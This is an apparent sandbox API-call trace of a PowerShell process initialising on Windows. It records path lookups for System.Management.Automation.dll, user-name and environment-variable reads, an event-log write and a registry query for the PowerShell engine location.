	[0489.650] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d150 | out: lpFileInformation=0x16d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0489.651] SetErrorMode (uMode=0x1) returned 0x1
	[0489.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.651] SetErrorMode (uMode=0x1) returned 0x1
	[0489.651] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d150 | out: lpFileInformation=0x16d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0489.651] SetErrorMode (uMode=0x1) returned 0x1
	[0489.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0489.654] SetErrorMode (uMode=0x1) returned 0x1
	[0489.654] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d410 | out: lpFileInformation=0x16d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0489.654] SetErrorMode (uMode=0x1) returned 0x1
	[0489.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0489.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0489.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0489.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.470] CoTaskMemAlloc (cb=0x804) returned 0x1b81d800
	[0490.470] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d800, nSize=0x16d778 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d778) returned 0x1
	[0490.471] CoTaskMemFree (pv=0x1b81d800) 
	[0490.471] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0490.471] GetUserNameW (in: lpBuffer=0x207ef0, pcbBuffer=0x16d7b8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d7b8) returned 1
	[0490.471] CoTaskMemFree (pv=0x207ef0) 
	[0490.472] ReportEventW (hEventLog=0x1ba00008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fc6ab0*="Available", lpRawData=0x2fc6840) returned 1
	[0491.248] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.248] CoTaskMemFree (pv=0x252be0) 
	[0491.250] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.250] CoTaskMemFree (pv=0x252be0) 
	[0491.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.256] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.256] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0491.257] CoTaskMemFree (pv=0x252be0) 
	[0491.257] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.257] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0491.257] CoTaskMemFree (pv=0x252be0) 
	[0491.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.259] GetCurrentProcessId () returned 0xf6c
	[0491.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d798 | out: phkResult=0x16d798*=0x398) returned 0x0
	[0491.264] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d71c, lpData=0x0, lpcbData=0x16d718*=0x0 | out: lpType=0x16d71c*=0x1, lpData=0x0, lpcbData=0x16d718*=0x56) returned 0x0
	[0491.264] CoTaskMemAlloc (cb=0x5a) returned 0x1b819590
	[0491.264] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d6ec, lpData=0x1b819590, lpcbData=0x16d6e8*=0x56 | out: lpType=0x16d6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d6e8*=0x56) returned 0x0
	[0491.264] CoTaskMemFree (pv=0x1b819590) 
	[0491.264] RegCloseKey (hKey=0x398) returned 0x0
	[0491.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.273] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.273] CoTaskMemFree (pv=0x252be0) 
	[0491.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
